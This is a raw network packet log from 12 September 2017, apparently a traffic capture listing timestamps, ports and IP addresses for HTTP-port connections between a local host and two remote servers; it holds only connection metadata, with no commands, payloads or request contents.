Sep 12, 2017 22:18:54.752577066 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.790338039 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.790384054 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.790399075 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.790622950 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.790657043 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.791507959 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.791533947 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.791591883 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.791641951 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:54.791671038 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:54.792190075 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.805332899 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.805629015 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.888734102 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.888758898 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.888775110 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.888830900 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.888839006 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.888994932 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.889007092 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.889014006 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.889070988 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.889102936 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.889698982 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.918622971 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.918663025 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.918678999 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.918951988 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:54.957428932 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.957456112 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.957462072 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:54.957725048 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.014584064 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.032139063 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.032166004 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.032177925 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.032346010 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.032443047 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.032474995 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.032484055 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.035717964 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.035758972 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.036505938 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.055464983 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.055505991 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.055530071 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.055680037 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.056984901 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.057028055 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.057048082 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.057060957 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.057188034 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.057218075 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.069308043 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.069355965 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.069374084 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.069547892 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.071249008 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.071286917 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.071305037 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.072057009 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.075867891 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.102484941 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.110235929 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.110264063 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.110658884 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.110692978 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.142420053 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.142450094 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.142462969 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.142661095 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.142707109 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.144965887 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.145004034 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.145013094 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.145313025 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.149353027 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.149379969 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.149388075 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.149503946 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.173904896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.174076080 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.176495075 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.176529884 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.176542044 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.176899910 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.213490009 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.213552952 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.213570118 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.213985920 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.214027882 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.214052916 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.215698957 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.215730906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.215950966 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.215985060 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.246917963 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.246953011 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.247133017 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.247165918 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.253251076 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.253288984 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.253999949 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.254041910 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.281466007 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.281496048 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.281507969 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.281950951 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.286166906 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.286194086 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.286200047 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.286617041 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.289621115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.289638042 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.289644003 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.290049076 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.312979937 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.313276052 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.319691896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.319714069 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.319725037 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.319919109 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.325500011 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.325540066 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.325551033 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.325829983 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.325892925 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.325923920 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.362838984 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.362863064 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.363615990 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.363668919 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.366790056 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.366812944 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.367187023 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.367218971 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.389594078 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.389617920 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.389626026 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.389946938 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.389978886 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.390492916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.390511990 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.390518904 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.391071081 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.398063898 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.398087025 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.398096085 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.398215055 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.437613010 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.437634945 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.437653065 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.437778950 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.470060110 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.470256090 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.470391989 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.470402956 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.470407963 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.470673084 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.472357988 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.472385883 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.472394943 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.472628117 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.472662926 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.472687960 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.487515926 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.487555027 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.488670111 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.488702059 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.509421110 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.509457111 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.509502888 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.509572029 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.509603024 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.510082960 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.520855904 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.520888090 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.520895958 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.520992994 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.542026043 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.542068005 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.542077065 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.542083979 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.542479992 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.543661118 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.543675900 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.543684006 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.543859959 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.544416904 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.544447899 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.544475079 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.544641018 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.574094057 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.574307919 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.584759951 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.584794044 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.584805965 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.584983110 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.598396063 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.598437071 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.598448992 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.598607063 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.598659992 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.598685980 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.598758936 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.598778963 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.599132061 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.599169016 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.638916969 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.638937950 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.638948917 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.639055014 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.639087915 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.663536072 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.663582087 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.663739920 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.663788080 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.693382025 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.693427086 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.693449020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.693756104 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.704349041 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.704390049 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.704407930 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.704771042 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.704802036 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.704900026 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.704945087 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.705504894 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.741358042 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.741745949 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.791446924 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.791492939 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.791517019 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.791760921 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.821373940 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.821398020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.821408033 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.821598053 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.831708908 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.831741095 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.831757069 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.831957102 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.869199991 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.869246006 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.869261980 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.869580030 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.874232054 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:55.874284983 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:55.926518917 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.926553965 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.926567078 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.926692963 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.949687958 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.949722052 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.949743986 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.949754953 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.949883938 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.949918985 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.953378916 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.968524933 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.968560934 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.968573093 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.968656063 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.968671083 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.968738079 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.968763113 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.972577095 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:55.982297897 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:55.982469082 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.071904898 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.071943998 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.071962118 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.072149992 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.095731974 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.095751047 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.095772028 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.095860958 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.095890045 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.095905066 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.109286070 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.109316111 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.109467983 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.109494925 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.134814024 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.134864092 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.135036945 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.135066032 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.231595993 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.231638908 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.231852055 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.231878042 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.261662006 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.261698961 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.261713028 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.261815071 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:56.261833906 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.261856079 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.269514084 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.269536972 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.269546986 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.269687891 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.270051003 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.270068884 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.270076990 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.270288944 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.293719053 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.293976068 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.303781033 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.303809881 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.303818941 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.303963900 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.338767052 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.338789940 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.338807106 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.338820934 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.338881016 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.338902950 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.339483023 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.365395069 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.365428925 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:56.365617990 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:56.367072105 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.367103100 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:56.367130995 MESZ	80	49199	91.219.236.207	192.168.1.16
